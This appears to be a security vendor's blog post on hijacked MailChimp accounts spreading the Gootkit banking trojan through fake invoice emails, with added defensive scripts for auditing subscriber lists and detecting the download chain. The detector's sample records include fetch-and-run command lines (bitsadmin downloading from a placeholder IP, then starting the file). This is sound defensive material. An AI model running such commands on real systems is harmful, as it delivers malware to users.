An increasing number of hijacked MailChimp accounts are being used to distribute spam emails and malware. Here's what you need to know.
What's happening: Criminals are using compromised MailChimp accounts to blast spam emails designed to infect victims with malware.
Using MailChimp helps spam campaigns bypass email filters: Because MailChimp is such a well-established email marketing provider (the company has millions of customers and distributes more than 1 billion emails per day), mail sent through its infrastructure is less likely to be caught by spam filters.
Campaigns have been launching at an increasing rate since last November: Spam emails were first seen being distributed via compromised MailChimp accounts located in Australia in November 2017. Campaigns were next spotted in Italy in January, quickly followed by more campaigns launched from compromised UK and US companies in February and March.
Emails linking to fake invoice files: The majority of the emails link to .zip files that contain .js files, which in turn download the malware payload. Other examples use BITSAdmin, a legitimate Windows data-transfer tool, to download the payload.
The malware being distributed is primarily Gootkit, a sophisticated banking trojan: Gootkit has a long, successful history of stealing passwords and other sensitive information. It has a wide range of capabilities and is notorious for its ability to evade detection by antivirus software, sandboxes, and other security solutions.
It's unclear how MailChimp accounts are being compromised: Experts believe the most likely explanation is that criminals are taking advantage of weak, stolen, and/or reused passwords.
Barkly protects users from these attacks: Barkly blocks Gootkit and malware like it thanks to its uniquely accurate file analysis powered by machine learning.
Criminals are always looking for new opportunities to distribute malware, and now they appear to be abusing MailChimp — one of the most popular email marketing service providers — to do it.
In the majority of campaigns, that malware has been Gootkit, a dangerous banking trojan outfitted with a variety of information-stealing capabilities (including keylogging, screen recording, and web injections) and notoriously designed for persistence and stealth.
Each campaign has introduced small variations, with criminals experimenting with different subject lines, body copy, and malware delivery mechanisms (for more details, see the timeline below). The criminals behind these campaigns are regularly iterating in order to further optimize their success rates, but the one thing they're not changing — the one thing that's definitively working — is sending these emails from compromised MailChimp accounts. Not only is it a "free" way for these criminals to amplify their reach, it's also helping them get past email filters.
Why taking control of MailChimp accounts is a dangerous (and obvious) move for criminals
As a spammer, your general goal is obviously to get your emails in front of as many prospective victims as possible. That requires mass distribution, and one of the most tried-and-true options is renting access to a botnet (a network of compromised computers), and using it to send out your spam emails for you.
The upside of utilizing a botnet is it can seriously amplify your reach. For example, some of the most prevalent malware of the past few years (Locky ransomware and the Dridex banking trojan) both relied on distribution from the Necurs botnet in order to send out millions and millions of emails.
The downside, of course, is using a botnet costs money. It can also be surprisingly competitive.
The criminals behind these MailChimp campaigns have stumbled across an incredibly effective alternative. By compromising MailChimp customers — either by taking advantage of weak passwords or tricking users into handing them over via phishing attempts — criminals can use their accounts to blast out thousands and thousands of spam emails for them.
End result: In addition to hijacking the distribution power of MailChimp, these operations are reaping an additional benefit — unlike emails sent from botnets, these are being distributed via a trusted sender.
It's enough to make criminals ask themselves, who needs a botnet when you have compromised MailChimp accounts?
What these emails look like
As detailed in the timeline below, the emails being sent in these campaigns have varied slightly from day to day and week to week. In general, the vast majority have been disguised as invoice notifications, with links to hosted .zip files rather than those files being attached (additionally helping them bypass email filters).
As shown in the following two examples, the emails often appear to be coming "on behalf of" an individual/organization associated with the invoice, though in some cases, the sender email address isn't a direct match.
Fake invoice notice sent from AZ Homes List via a compromised MailChimp account. Source: My Online Security
Fake invoice notice sent from City Sign & Graphics, LTD via a compromised MailChimp account. Source: My Online Security
250,000 spam emails sent from one compromised account — what these hijacks look like from the MailChimp account owner's perspective
According to reports received by Derek Knight of My Online Security, once criminals have gained access to a MailChimp account they either replace the victim's subscriber list with a list of their own target email addresses, or they simply upload their list alongside it so that both lists receive the spam campaign.
A comment left on My Online Security paints a more detailed picture:
My Mailchimp account got breached, no malware on any pc used to access the service, no login sharing, although Two-Factor wasn't setup (It is since the breach). I knew of the breach because my main admin got a notification email from Mailchimp at 2AM saying a 250k subscriber list was successfully imported (my normal list is of about 6k), so the attackers just import their own list into the breached account and sent it through there, and then just delete the sent campaign.
MailChimp account owners should be on high alert for any suspicious list uploads and/or email activity: a list import notification at an odd hour, a list far larger than the audiences they normally maintain, or a campaign that was sent and then deleted. To avoid having their accounts hijacked in the first place, experts are also urgently recommending account owners to utilize two-factor authentication (2FA). Instructions from MailChimp on enabling 2FA can be found here.
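The account-owner side of this can be checked on a schedule rather than waiting for a 2AM notification. The script below is an added example, not code from the original post or from MailChimp: it compares the audiences (subscriber lists) in an account against a baseline the owner recorded earlier and flags exactly what the comment above describes, a list the owner never created, a list whose member count has jumped or collapsed (an overwritten list), or a list that has disappeared. The live fetch assumes the Marketing API's GET /3.0/lists endpoint, an API key of the form <key>-<dc>, and HTTP basic auth with any username; only the `id`, `name` and `stats.member_count` fields are read. The thresholds and the sample records are constructed for illustration.

```python
"""Audit a Mailchimp account's audiences against the owner's own baseline and
flag the signs of a hijacked account: an unknown list, a list whose member
count changed drastically, or a list that vanished.
Assumptions (not from the article): API shape, key format, thresholds."""
import json
import urllib.request
from base64 import b64encode
from typing import Dict, List


def fetch_lists(api_key: str) -> List[dict]:
    """Live fetch of the account's lists (assumption: key looks like <key>-<dc>,
    basic auth with any username, fields trimmed to what audit() needs)."""
    dc = api_key.rsplit("-", 1)[-1]
    url = (f"https://{dc}.api.mailchimp.com/3.0/lists"
           "?count=1000&fields=lists.id,lists.name,lists.stats.member_count")
    req = urllib.request.Request(url)
    token = b64encode(f"anystring:{api_key}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)["lists"]


def audit(lists: List[dict], baseline: Dict[str, int],
          ratio: float = 3.0, min_jump: int = 5000) -> List[dict]:
    """Return one finding per suspicious list.
    `baseline` maps list id -> member count the owner expects (recorded by hand
    or from a previous, trusted run). A list is flagged when it is not in the
    baseline, when it grew past both ratio*expected and expected+min_jump,
    when it shrank to a third or less of expected, or when it is gone."""
    findings = []
    seen = set()
    for lst in lists:
        lid, count = lst["id"], lst["stats"]["member_count"]
        seen.add(lid)
        if lid not in baseline:
            findings.append({"id": lid, "name": lst["name"],
                             "reason": "unknown_list", "member_count": count})
            continue
        expected = baseline[lid]
        grew = count >= max(expected * ratio, expected + min_jump)
        shrank = expected > 0 and count * ratio <= expected   # overwritten/emptied list
        if grew or shrank:
            findings.append({"id": lid, "name": lst["name"],
                             "reason": "member_count_change",
                             "member_count": count, "expected": expected})
    for lid in baseline.keys() - seen:
        findings.append({"id": lid, "reason": "list_missing",
                         "expected": baseline[lid]})
    return findings


# Constructed baseline: the owner's two real audiences plus one that has been deleted.
BASELINE = {"a1b2c3d4e5": 6000, "b2c3d4e5f6": 1200, "c3d4e5f6a7": 300}

# Constructed response, shaped like the API's `lists` array (not real account data).
SAMPLE_LISTS = [
    {"id": "a1b2c3d4e5", "name": "Newsletter", "stats": {"member_count": 6120}},
    {"id": "b2c3d4e5f6", "name": "Customers", "stats": {"member_count": 248000}},
    {"id": "f6e7d8c9b0", "name": "import_03", "stats": {"member_count": 250000}},
]

if __name__ == "__main__":
    # For a live run: audit(fetch_lists(API_KEY), BASELINE)
    for finding in audit(SAMPLE_LISTS, BASELINE):
        print(finding)
```

Run it from a scheduled task and page on any non-empty result; the baseline should be refreshed only by a human after a legitimate import, otherwise an attacker's 250k list becomes tomorrow's "normal".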
In the early cases from November 2017, it appears the criminals were simply sending out spam emails to the compromised organizations' mailing lists. That's something that would change when new emails began being sent from compromised Italian organizations this January. In these campaigns, criminals appear to have avoided sending the spam emails to the organizations' mailing lists, choosing to upload their own list of email addresses instead.
Instead of fake invoice notifications, the emails were disguised as Italian tax notices sent from the Ministero dell’Economia e delle Finanze.
A few days later, Knight began tracking new campaigns taking advantage of compromised UK and US organizations on My Online Security, noting for the first time that the malware being distributed was the Gootkit trojan.
On February 22, new campaigns were spotted being sent from organizations including Infinity Cottage and Cosmic Intelligence. In addition to a link to a hosted .zip file, these emails also included a link to a macro-enabled Word document that downloaded a .scr file (a screensaver file, which Windows runs as an ordinary executable).
Days later, on February 26 and 27, criminals were back at it, though they apparently decided to drop the second link to the Word document and go back to including just one link to a booby-trapped .zip file.
After a brief lull, new campaigns were launched on March 12, following what (for the moment, anyhow) appears to be a fairly stable pattern of fake invoice email --> link to .zip file containing .lnk file --> download Gootkit using bitsadmin.exe.
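The March pattern above (.zip, then a .js or .lnk, then bitsadmin.exe pulling Gootkit) leaves a recognizable trail in process-creation telemetry, and that trail is where a defender who does not control the mail stream can still catch it. The script below is an added example, not code from the original post or from Barkly: it runs three rules over Sysmon Event ID 1 style records, flagging bitsadmin.exe used as a downloader (a /transfer job with a URL) from a shell, script host or shortcut; wscript/cscript running a .js, especially one Explorer unpacked from a zip into its Temp<n>_<archive>.zip folder; and cmd.exe spawned by Explorer (what a double-clicked .lnk looks like) whose command line drives bitsadmin. The field names, rule names and sample records are constructed for illustration; 203.0.113.10 is a documentation address, not a real host.

```python
"""Flag process-creation events matching the .zip -> .js/.lnk -> bitsadmin.exe
download chain. Constructed Sysmon-style records, not real telemetry."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field names assumed)."""
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


# Explorer unpacks a file opened straight from a .zip into %TEMP%\Temp<n>_<archive>.zip\
TEMP_ZIP_RE = re.compile(r"\\Temp\\Temp\d+_[^\\]+\.zip\\", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
JS_RE = re.compile(r"\.jse?\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents that mean "a user-launched shell, script or shortcut", not a service
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "explorer.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the detection tags that apply to one event (empty list = benign)."""
    tags: List[str] = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    cl = ev.command_line.lower()

    # 1. bitsadmin.exe used as a downloader: a /transfer job fetching a URL
    if img == "bitsadmin.exe" and "/transfer" in cl and URL_RE.search(ev.command_line):
        tags.append("bitsadmin_download")
        if parent in SUSPICIOUS_PARENTS:
            tags.append("bitsadmin_from_shell_or_shortcut")

    # 2. wscript/cscript running a .js, worse if it was opened straight from a zip
    if img in SCRIPT_HOSTS and JS_RE.search(cl):
        tags.append("script_host_js")
        if TEMP_ZIP_RE.search(ev.command_line):
            tags.append("js_run_from_zip")

    # 3. cmd.exe spawned by Explorer (a double-clicked .lnk) driving bitsadmin
    if img == "cmd.exe" and parent == "explorer.exe" and "bitsadmin" in cl:
        tags.append("lnk_cmd_bitsadmin")
    return tags


def scan(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Index and tags of every event that tripped at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            hits.append((i, tags))
    return hits


# Constructed sample records (not real logs). Events 0-2 mirror the campaign's
# chain; 3 and 4 are benign controls (an admin listing BITS jobs, Word opening a doc).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\AppData\Local\Temp\Temp1_Invoice_4471.zip\Invoice_4471.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer upd /download /priority foreground http://203.0.113.10/inv.png C:\Users\alice\AppData\Local\Temp\inv.exe",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\System32\cmd.exe /c "bitsadmin /transfer j /download http://203.0.113.10/inv.png %TEMP%\inv.exe & start %TEMP%\inv.exe"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /list /allusers",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Documents\report.docx"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(tags)}")
```

Rule 1 on its own is the broadest and the most durable: bitsadmin with /transfer and a URL is rare in normal user sessions, and it survives the attackers swapping .js for .lnk (or for a macro) in front of it. Tune the parent list to the environment before alerting on it, since software deployment tooling sometimes calls bitsadmin from a script too.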
What to do now
This has unfortunately become a very active criminal operation that requires preventative action from all of us in order to make it go away.
MailChimp account owners:
If they haven't already, MailChimp users need to enable two-factor authentication (2FA) now. With 2FA on, anyone logging in to the account must also supply a one-time verification code generated on, or delivered to, a device the account owner holds, so a stolen, reused, or phished password alone is no longer enough. As mentioned above, MailChimp has provided instructions for enabling 2FA here.
As the extent of this abuse continues to grow, MailChimp should also consider making 2FA enabled by default. That could potentially have a dramatic effect on reducing these attacks.
For the rest of us, the usual advice of informing end users about this threat and training them not to open attachments, or follow links to downloads, that they're not expecting is key. In these campaigns the malicious file is a linked download rather than an attachment, so "I didn't open any attachment" is not the reassurance it sounds like.
But companies can avoid putting all the pressure on employees by ensuring they're properly protected by modern endpoint protection designed to block even the newest malware that antivirus solutions routinely miss.
Barkly blocks GootKit and other malware payloads before they can do any damage
Mistakes happen, and users routinely fall for spam and phishing emails, despite regular training. Barkly serves as an effective safety net for users, blocking the Gootkit samples being distributed in these campaigns before the malware can successfully execute.